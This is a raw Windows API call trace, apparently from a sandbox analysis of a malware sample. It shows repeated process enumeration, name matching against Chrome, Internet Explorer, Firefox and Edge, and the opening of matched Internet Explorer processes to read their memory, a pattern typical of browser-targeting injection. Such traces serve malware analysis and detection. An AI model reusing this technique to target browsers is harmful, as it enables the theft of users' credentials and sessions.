	[0232.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6ea0
	[0232.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.797] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0232.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.797] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.797] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0232.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.798] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0232.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6ea4
	[0232.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.799] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0232.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.799] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.799] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0232.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.800] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.800] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0232.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6ea8
	[0232.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.801] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0232.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.801] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.802] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0232.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.802] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0232.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6eac
	[0232.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.804] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0232.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.805] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.806] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0232.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.806] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0232.808] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6eb0
	[0232.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.808] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0232.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.808] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.809] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0232.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.809] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0232.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6eb4
	[0232.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.811] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0232.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.811] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.812] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0232.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.813] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.813] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0232.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6eb8
	[0232.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.814] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0232.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.815] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.816] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0232.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.816] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.816] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6ebc
	[0232.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.817] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0232.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.818] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0232.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.818] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0232.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.818] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.819] NtQueryInformationProcess (in: ProcessHandle=0x6ebc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0232.819] ReadProcessMemory (in: hProcess=0x6ebc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0232.819] ReadProcessMemory (in: hProcess=0x6ebc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0232.819] ReadProcessMemory (in: hProcess=0x6ebc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0232.819] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0232.819] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0232.820] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6ec0
	[0232.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.821] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0232.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.821] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0232.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.821] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0232.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.822] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.822] NtQueryInformationProcess (in: ProcessHandle=0x6ec0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0232.822] ReadProcessMemory (in: hProcess=0x6ec0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0232.822] ReadProcessMemory (in: hProcess=0x6ec0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0232.822] ReadProcessMemory (in: hProcess=0x6ec0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0232.822] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0232.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0232.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6ec4
	[0232.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.823] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0232.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.824] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.824] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0232.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.824] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.824] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0232.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6ec8
	[0232.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.825] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0232.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.826] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.826] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0232.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.826] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.827] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.827] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6ecc
	[0232.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.828] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.828] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.828] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.829] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.829] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.830] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6ed0
	[0232.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.831] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.831] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.832] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.832] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6ed4
	[0232.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.833] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.834] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.834] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.834] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.835] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0232.835] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6ed8
	[0232.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.836] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0232.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.836] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.836] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0232.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.837] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0232.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6edc
	[0232.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.838] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.838] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.839] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.839] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6ee0
	[0232.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.840] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.841] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.841] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.841] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.842] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0232.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6ee4
	[0232.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.843] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0232.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.843] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.843] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0232.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.844] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.844] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0232.844] CloseHandle (hObject=0x4fd0) returned 1
	[0232.845] Sleep (dwMilliseconds=0x64) 
	[0232.957] GetCurrentProcessId () returned 0x110
	[0232.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0232.959] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0232.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0232.961] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0232.962] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6ee8
	[0232.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.962] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.962] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.962] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.963] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.963] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6eec
	[0232.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.964] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.964] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.964] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0232.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.965] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0232.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6ef0
	[0232.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.966] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0232.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.967] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0232.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.967] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0232.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.968] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0232.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0232.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6ef4
	[0232.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.969] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0232.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0232.969] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
